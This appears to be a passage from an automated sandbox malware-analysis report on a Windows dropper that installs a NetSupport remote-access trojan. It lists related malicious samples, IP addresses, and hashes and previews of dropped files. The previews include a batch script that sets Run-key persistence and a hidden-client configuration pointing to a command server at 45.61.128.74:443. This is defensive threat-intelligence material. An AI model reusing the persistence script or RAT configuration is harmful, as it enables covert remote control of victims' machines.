                                                                  • 104.26.0.231
                                                                  KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                  • 104.26.0.231
                                                                  KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                  • 104.26.0.231
                                                                  72BF1aHUKl.msiGet hashmaliciousNetSupport RATBrowse
                                                                  • 172.67.68.212
                                                                  hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • 104.26.0.231
                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • 104.26.1.231
                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • 104.26.1.231

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  M247GBloligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                  • 104.224.90.41
                                                                  comprobante.exeGet hashmaliciousRemcosBrowse
                                                                  • 176.10.80.43
                                                                  7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                                  • 95.174.64.138
                                                                  fACYdCvub8.exeGet hashmaliciousUnknownBrowse
                                                                  • 95.174.66.19
                                                                  7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                                  • 193.29.107.181
                                                                  fACYdCvub8.exeGet hashmaliciousUnknownBrowse
                                                                  • 217.138.199.203
                                                                  arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 192.230.38.194
                                                                  x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 38.202.249.45
                                                                  mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 38.204.82.51
                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                  • 91.202.233.141
                                                                  CLOUDFLARENETUSLAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 172.67.177.134
                                                                  DGTCkacbSz.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 172.67.129.178
                                                                  idk_1.ps1Get hashmaliciousUnknownBrowse
                                                                  • 172.67.129.178
                                                                  FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                                                  • 172.67.129.178
                                                                  Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                  • 104.26.13.205
                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                  • 172.64.41.3
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.155.47
                                                                  PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                  • 104.26.13.205
                                                                  0Xp3q1l7De.exeGet hashmaliciousRemcosBrowse
                                                                  • 172.64.41.3
                                                                  DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 104.21.24.198

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\Public\Netstat\HTCTL32.DLLfile.exeGet hashmaliciousNetSupport RATBrowse
                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                      KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                        KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                            file.exeGet hashmaliciousNetSupport RATBrowse
                                                                              CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                  CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                    CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse

                                                                                      Created / dropped Files

                                                                                      C:\Users\Public\Netstat\HTCTL32.DLL

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):328056
                                                                                      Entropy (8bit):6.754723001562745
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                      MD5:2D3B207C8A48148296156E5725426C7F
                                                                                      SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                      SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                      SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\HTCTL32.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: KC0uZWwr8p.exe, Detection: malicious, Browse
                                                                                      • Filename: KC0uZWwr8p.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                      • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                      • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                      • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\Public\Netstat\NSM.LIC

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):257
                                                                                      Entropy (8bit):5.119720931145611
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
                                                                                      MD5:7067AF414215EE4C50BFCD3EA43C84F0
                                                                                      SHA1:C331D410672477844A4CA87F43A14E643C863AF9
                                                                                      SHA-256:2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
                                                                                      SHA-512:17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
                                                                                      Malicious:false
                                                                                      Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..

                                                                                      C:\Users\Public\Netstat\PCICHEK.DLL

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18808
                                                                                      Entropy (8bit):6.22028391196942
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                      MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                      SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                      SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                      SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICHEK.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\Public\Netstat\PCICL32.DLL

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):3735416
                                                                                      Entropy (8bit):6.525042992590476
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
                                                                                      MD5:00587238D16012152C2E951A087F2CC9
                                                                                      SHA1:C4E27A43075CE993FF6BB033360AF386B2FC58FF
                                                                                      SHA-256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
                                                                                      SHA-512:637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................

                                                                                      C:\Users\Public\Netstat\TCCTL32.DLL

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):396664
                                                                                      Entropy (8bit):6.809064783360712
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                      MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                      SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                      SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                      SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\TCCTL32.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\Public\Netstat\client32.ini

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):700
                                                                                      Entropy (8bit):5.533099732210104
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Wrqzd+mPZGS/py6z8BlsVTXuZ7+DP981E7GXXfDWQClnmSuZIAlkz6:mqzEmPZly6YBlLoG1fXXfDioIAaz6
                                                                                      MD5:5778ABD7CF2E8039239CD5982281D61A
                                                                                      SHA1:9AA6E80A115343A100031C9473FC6A071EEFD07E
                                                                                      SHA-256:0BD4DC8B66C588F715B117021EF14C959E396F5CC6041F885F0D121401BC267A
                                                                                      SHA-512:DC01567D881D48554732747A286AC9A95EF095B4CB860F384B85636B160778C9EFE366F53550B74D9DDF504B293F03BBB252E5247F03490E4567AD142DEF6E0A
                                                                                      Malicious:false
                                                                                      Preview:0x289612fe....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAOeJWid73S6SvOyjjiTDVewA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0......[HTTP]..GatewayAddress=45.61.128.74:443..gsk=EFHH;K>OBDEJ9A<I@BCB..gskmode=0..gsku=EFHH;K>OBDEJ9A<I@BCB..GSKX=EFHH;K>OBDEJ9A<I@BCB....

                                                                                      C:\Users\Public\Netstat\msvcr100.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):773968
                                                                                      Entropy (8bit):6.901559811406837
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                      MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                      SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                      SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                      SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\Public\Netstat\netsup.bat

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):519
                                                                                      Entropy (8bit):5.1565107291104475
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:HVj0Kprgidqu1M+Vj0Kprgidqu1oOrvuprgidqu1kprgidqu1oOC:HVyINVyI4cIjI4T
                                                                                      MD5:B50D05F1710CD8674DB0AE8207722DD0
                                                                                      SHA1:9896143256FB62F915EA41D8001AD10BC66D99BB
                                                                                      SHA-256:F4A4726FDF39D43807ED2786BB9B2F881C8C7C8B666E14A96F7B2239C7A4BEDD
                                                                                      SHA-512:3D57684675904055EA3BAAE6E343F5B5A068104EBF97EDFA28687A18855B3F5173847B9283C704636A457B434CA3ACB9D27A4075ECBCD1E5F6A2735B1E444D04
                                                                                      Malicious:true
                                                                                      Preview:@echo off..REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\shv.exe"..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\shv.exe"..start %Public%\Netstat\shv.exe..REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\shv.exe"..REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\shv.exe"..start %Public%\Netstat\shv.exe

                                                                                      C:\Users\Public\Netstat\nskbfltr.inf

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:Windows setup INFormation
                                                                                      Category:dropped
                                                                                      Size (bytes):328
                                                                                      Entropy (8bit):4.93007757242403
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                      MD5:26E28C01461F7E65C402BDF09923D435
                                                                                      SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                      SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                      SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                      Malicious:false
                                                                                      Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                      C:\Users\Public\Netstat\pcicapi.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):33144
                                                                                      Entropy (8bit):6.737780491933496
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                      MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                      SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                      SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                      SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\pcicapi.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\Public\Netstat\remcmdstub.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):77224
                                                                                      Entropy (8bit):6.793971095882093
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:zfafvTuNOwphKuyUHTqYXHhrXH4+LIyrxomee/+5IrAee/DIr3:jafLSpAFUzt0+LIyr7eR5IUeCIz
                                                                                      MD5:325B65F171513086438952A152A747C4
                                                                                      SHA1:A1D1C397902FF15C4929A03D582B09B35AA70FC0
                                                                                      SHA-256:26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
                                                                                      SHA-512:6829555AB3851064C3AAD2D0C121077DB0260790B95BF087B77990A040FEBD35B8B286F1593DCCAA81B24395BD437F5ADD02037418FD5C9C8C78DC0989A9A10D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L...c..c.....................J.......!............@.......................... ............@....................................<.......T................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\Public\Netstat\shv.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):105848
                                                                                      Entropy (8bit):4.68250265552195
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
                                                                                      MD5:8D9709FF7D9C83BD376E01912C734F0A
                                                                                      SHA1:E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
                                                                                      SHA-256:49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
                                                                                      SHA-512:042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\shv.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@..................................K....@.................................< ..<....0...i...........t..x).......... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loca[1].htm

                                                                                      Download File
                                                                                      Process:C:\Users\Public\Netstat\shv.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):16
                                                                                      Entropy (8bit):3.077819531114783
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:llD:b
                                                                                      MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                                                      SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                                                      SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                                                      SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                                                      Malicious:false
                                                                                      Preview:40.7357,-74.1724

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Entropy (8bit):7.881035102524664
                                                                                      TrID:
                                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:file.exe
                                                                                      File size:2'283'788 bytes
                                                                                      MD5:a3cea314d888a08b79002656a9f4b927
                                                                                      SHA1:396b9f96219785f0c80c69703dc623c23554affc
                                                                                      SHA256:64356e6b4781925ef940695d869a826dc229e911919faf8729d8dfb34f31e61a
                                                                                      SHA512:a279ce78302acb55f97181cf1bcd80982ca794995273af971c027fbb63b8ed7db14007ae0f84001d3a8b0502ca556cedb9ed4d6e95925bf853c2993f028b078d
                                                                                      SSDEEP:49152:kDjlabwz9F+H1Zf8NNbTfvaw2EheBgtpsDf5Log8nUQkFG534txeqJ:0qwPk1ZfWhvcEhQGa178UnFdJ
                                                                                      TLSH:CEB51209E3E909F5D0B7E53CCA668D02F77A7C5903309A8F23B0565A1F673A09E39761
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\

                                                                                      File Icon

                                                                                      Icon Hash:1515d4d4442f2d2d

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x140032ee0
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x140000000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x66409723 [Sun May 12 10:17:07 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:2
                                                                                      File Version Major:5
                                                                                      File Version Minor:2
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:2
                                                                                      Import Hash:b1c5b1beabd90d9fdabd1df0779ea832

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      dec eax
                                                                                      sub esp, 28h
                                                                                      call 00007FB77D09E1A8h
                                                                                      dec eax
                                                                                      add esp, 28h
                                                                                      jmp 00007FB77D09DB3Fh
                                                                                      int3
                                                                                      int3
                                                                                      dec eax
                                                                                      mov eax, esp
                                                                                      dec eax
                                                                                      mov dword ptr [eax+08h], ebx
                                                                                      dec eax
                                                                                      mov dword ptr [eax+10h], ebp
                                                                                      dec eax
                                                                                      mov dword ptr [eax+18h], esi
                                                                                      dec eax
                                                                                      mov dword ptr [eax+20h], edi
                                                                                      inc ecx
                                                                                      push esi
                                                                                      dec eax
                                                                                      sub esp, 20h
                                                                                      dec ebp
                                                                                      mov edx, dword ptr [ecx+38h]
                                                                                      dec eax
                                                                                      mov esi, edx
                                                                                      dec ebp
                                                                                      mov esi, eax
                                                                                      dec eax
                                                                                      mov ebp, ecx
                                                                                      dec ecx
                                                                                      mov edx, ecx
                                                                                      dec eax
                                                                                      mov ecx, esi
                                                                                      dec ecx
                                                                                      mov edi, ecx
                                                                                      inc ecx
                                                                                      mov ebx, dword ptr [edx]
                                                                                      dec eax
                                                                                      shl ebx, 04h
                                                                                      dec ecx
                                                                                      add ebx, edx
                                                                                      dec esp
                                                                                      lea eax, dword ptr [ebx+04h]
                                                                                      call 00007FB77D09CFC3h
                                                                                      mov eax, dword ptr [ebp+04h]
                                                                                      and al, 66h
                                                                                      neg al
                                                                                      mov eax, 00000001h
                                                                                      sbb edx, edx
                                                                                      neg edx
                                                                                      add edx, eax
                                                                                      test dword ptr [ebx+04h], edx
                                                                                      je 00007FB77D09DCD3h
                                                                                      dec esp
                                                                                      mov ecx, edi
                                                                                      dec ebp
                                                                                      mov eax, esi
                                                                                      dec eax
                                                                                      mov edx, esi
                                                                                      dec eax
                                                                                      mov ecx, ebp
                                                                                      call 00007FB77D09FCE7h
                                                                                      dec eax
                                                                                      mov ebx, dword ptr [esp+30h]
                                                                                      dec eax
                                                                                      mov ebp, dword ptr [esp+38h]
                                                                                      dec eax
